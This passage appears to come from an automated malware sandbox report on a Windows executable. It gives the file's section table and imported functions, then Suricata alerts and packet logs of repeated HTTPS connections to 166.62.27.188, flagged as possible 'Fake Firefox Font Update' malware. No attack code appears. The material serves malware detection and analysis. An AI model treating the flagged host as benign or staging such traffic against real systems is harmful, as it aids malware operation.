.bss | 0x71000 | 0x36ec | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x75000 | 0x266e | 0x2800 | f0f9a1156b641e5ea253cb6ddcaf08ba | False | 0.3103515625 | data | 4.872671403071516 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x78000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x79000 | 0x18 | 0x200 | 5b11e123dd9b7f6d94b27d2ad6e9bc83 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7a000 | 0x7ce8 | 0x7e00 | 3b0f62de599dc8a77438a9e2115a0b81 | False | 0.6107390873015873 | data | 6.679791141044884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x82000 | 0xa1c00 | 0xa1c00 | 56ed1027dde62713b525386341887dd6 | False | 0.50098410935085 | data | 6.976945226119281 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll | GetOpenFileNameA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-14T08:24:19.092947+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49736 | 166.62.27.188 | 443 | TCP
                      2025-01-14T08:25:26.432785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750057166.62.27.188443TCP
                      2025-01-14T08:25:28.044816+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750059166.62.27.188443TCP
                      2025-01-14T08:25:29.646269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750061166.62.27.188443TCP
                      2025-01-14T08:25:31.265412+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750063166.62.27.188443TCP
                      2025-01-14T08:25:32.866485+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750065166.62.27.188443TCP
                      2025-01-14T08:25:34.498486+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750067166.62.27.188443TCP
                      2025-01-14T08:25:36.129137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750069166.62.27.188443TCP
                      2025-01-14T08:25:37.762164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750071166.62.27.188443TCP
                      2025-01-14T08:25:39.379253+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750073166.62.27.188443TCP
                      2025-01-14T08:25:41.101780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750075166.62.27.188443TCP
                      2025-01-14T08:25:42.727228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750077166.62.27.188443TCP
                      2025-01-14T08:25:44.331133+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750079166.62.27.188443TCP
                      2025-01-14T08:25:45.925793+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750081166.62.27.188443TCP
                      2025-01-14T08:25:47.523448+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750083166.62.27.188443TCP
                      2025-01-14T08:25:49.146879+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750085166.62.27.188443TCP
                      2025-01-14T08:25:50.761138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750087166.62.27.188443TCP
                      2025-01-14T08:25:52.391696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750089166.62.27.188443TCP
                      2025-01-14T08:25:53.995868+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750091166.62.27.188443TCP
                      2025-01-14T08:25:55.595114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750093166.62.27.188443TCP
                      2025-01-14T08:25:57.206028+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750095166.62.27.188443TCP
                      2025-01-14T08:25:58.804789+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750097166.62.27.188443TCP
                      2025-01-14T08:26:00.427630+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750099166.62.27.188443TCP
                      2025-01-14T08:26:02.053407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750101166.62.27.188443TCP
                      2025-01-14T08:26:03.685391+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750103166.62.27.188443TCP
                      2025-01-14T08:26:05.321840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750105166.62.27.188443TCP
                      2025-01-14T08:26:06.930971+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750107166.62.27.188443TCP
                      2025-01-14T08:26:08.575370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750109166.62.27.188443TCP
                      2025-01-14T08:26:10.299114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750111166.62.27.188443TCP
                      2025-01-14T08:26:11.895894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750113166.62.27.188443TCP
                      2025-01-14T08:26:13.493604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750115166.62.27.188443TCP
                      2025-01-14T08:26:15.115309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750117166.62.27.188443TCP
                      2025-01-14T08:26:16.712923+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750119166.62.27.188443TCP
                      2025-01-14T08:26:18.325954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750121166.62.27.188443TCP
                      2025-01-14T08:26:19.976479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750123166.62.27.188443TCP
                      2025-01-14T08:26:21.590786+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750125166.62.27.188443TCP
                      Timestamp    Source Port    Dest Port    Source IP    Dest IP
                      Jan 14, 2025 08:24:37.488204956 CET49874443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.488210917 CET44349874166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:37.614321947 CET49884443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.614365101 CET44349884166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:37.614433050 CET49884443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.614599943 CET49884443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.614633083 CET44349884166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:37.614696980 CET49884443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.622971058 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.623017073 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:37.623090982 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.623428106 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:37.623439074 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:38.511965036 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:38.512053967 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:38.513503075 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:38.513509989 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:38.513737917 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:38.516174078 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:38.563344955 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.096960068 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.097423077 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.097475052 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.097541094 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.097552061 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.097589970 CET49885443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.097595930 CET44349885166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.224792957 CET49896443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.224845886 CET44349896166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.224931955 CET49896443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.225043058 CET49896443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.225078106 CET44349896166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.225126982 CET49896443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.227314949 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.227375984 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:39.227463007 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.227818966 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:39.227840900 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.131866932 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.131970882 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.134843111 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.134866953 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.135116100 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.136574030 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.183330059 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.723225117 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.723536968 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.723620892 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.724358082 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.724387884 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.724402905 CET49897443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.724410057 CET44349897166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.858391047 CET49908443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.858429909 CET44349908166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.858549118 CET49908443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.862016916 CET49908443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.862042904 CET44349908166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.862096071 CET49908443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.898688078 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.898730040 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:40.898807049 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.899080992 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:40.899099112 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:41.800601006 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:41.800709009 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:41.802051067 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:41.802058935 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:41.802320004 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:41.803607941 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:41.851345062 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.390316963 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.390477896 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.390557051 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.390697002 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.390711069 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.390733957 CET49909443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.390741110 CET44349909166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.516201973 CET49920443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.516247034 CET44349920166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.516347885 CET49920443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.516545057 CET49920443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.516607046 CET44349920166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.516665936 CET49920443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.518421888 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.518464088 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:42.518522024 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.518853903 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:42.518866062 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:43.425523996 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:43.425646067 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:43.426934958 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:43.426943064 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:43.427192926 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:43.428461075 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:43.475351095 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.014283895 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.014679909 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.014785051 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.014832973 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.014858007 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.014869928 CET49921443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.014877081 CET44349921166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.149857998 CET49932443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.149905920 CET44349932166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.150002003 CET49932443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.150206089 CET49932443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.150247097 CET44349932166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.150299072 CET49932443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.153480053 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.153525114 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:44.153593063 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.153914928 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:44.153928041 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:45.717690945 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:45.717792988 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:45.719329119 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:45.719335079 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:45.719628096 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:45.721066952 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:45.763340950 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.315053940 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.315186024 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.315283060 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.315474033 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.315525055 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.315557003 CET49933443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.315589905 CET44349933166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.442409992 CET49944443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.442492008 CET44349944166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.442637920 CET49944443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.442785025 CET49944443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.442826033 CET44349944166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.442887068 CET49944443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.445099115 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.445171118 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:46.445261955 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.445607901 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:46.445622921 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.342174053 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.342261076 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.343519926 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.343528986 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.343786955 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.345345974 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.387341022 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.934433937 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.934782982 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.934855938 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.934931993 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.934952021 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:47.934962988 CET49945443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:47.934968948 CET44349945166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.060286045 CET49956443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.060337067 CET44349956166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.060448885 CET49956443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.060636044 CET49956443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.060691118 CET44349956166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.060754061 CET49956443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.062983036 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.063030958 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.063123941 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.063460112 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.063473940 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.958142996 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.958262920 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.959539890 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:48.959547997 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.959806919 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:48.960983992 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.007325888 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.549582005 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.549891949 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.550044060 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.550044060 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.550159931 CET49957443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.550173998 CET44349957166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.682025909 CET49968443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.682071924 CET44349968166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.682128906 CET49968443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.682486057 CET49968443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.682542086 CET44349968166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.682590961 CET49968443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.685064077 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.685115099 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:49.685247898 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.685869932 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:49.685883045 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:50.737339020 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:50.737446070 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:50.738655090 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:50.738665104 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:50.738924026 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:50.740128994 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:50.787333012 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:51.336653948 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:51.337060928 CET44349969166.62.27.188192.168.2.7
                      Jan 14, 2025 08:24:51.337157011 CET49969443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:24:51.337193012 CET49969443192.168.2.7166.62.27.188
